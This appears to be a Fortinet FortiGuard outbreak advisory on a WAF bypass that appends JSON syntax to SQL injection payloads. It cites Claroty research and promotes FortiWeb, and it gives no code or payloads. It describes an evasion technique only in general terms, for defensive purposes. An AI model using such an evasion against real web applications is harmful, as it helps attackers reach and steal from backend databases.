Outbreak AlertGeneric Web Application Firewall (WAF) Security Bypass
Abusing JSON-Based SQL to Bypass WAF
Recently, security researchers at Claroty posted a blog describing a method for bypassing some vendors WAF solutions. The attack technique involves appending JSON syntax to SQL injection payloads. Learn More »
Background
The method described bypasses malicious requests that used JSON (JavaScript Object Notation) syntax appended to SQL injection payloads. Attackers could then use these techniques to get access to a backend database and use additional vulnerabilities to exfiltrate data via either direct access to the server or over the cloud.
Latest Development
Recent news and incidents related to cybersecurity threats encompassing various events such as data breaches, cyber-attacks, security incidents, and vulnerabilities discovered.
December 8th, 2022: Claroty Team82 posted a research at: https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf
Fortinet customers using the FortiWeb (Web Application Firewall) remain protected against these types of evasion techniques. FortiWeb ML for anomaly Detection protects against zero-day and such unknown attacks without requiring any special configuration.
https://www.fortinet.com/products/web-application-firewall/fortiweb
FortiGuard Cybersecurity Framework
Mitigate security threats and vulnerabilities by leveraging the range of FortiGuard Services.
-
Anomaly Detection
-
Threat Hunting
-
Automated Response
-
Assisted Response Services
-
InfoSec Services
-
Attack Surface Monitoring (Inside & Outside)
Threat Intelligence
Information gathered from analyzing ongoing cybersecurity events including threat actors, their tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), malware and related vulnerabilities.
Indicators of compromise
References
Sources of information in support and relation to this Outbreak and vendor.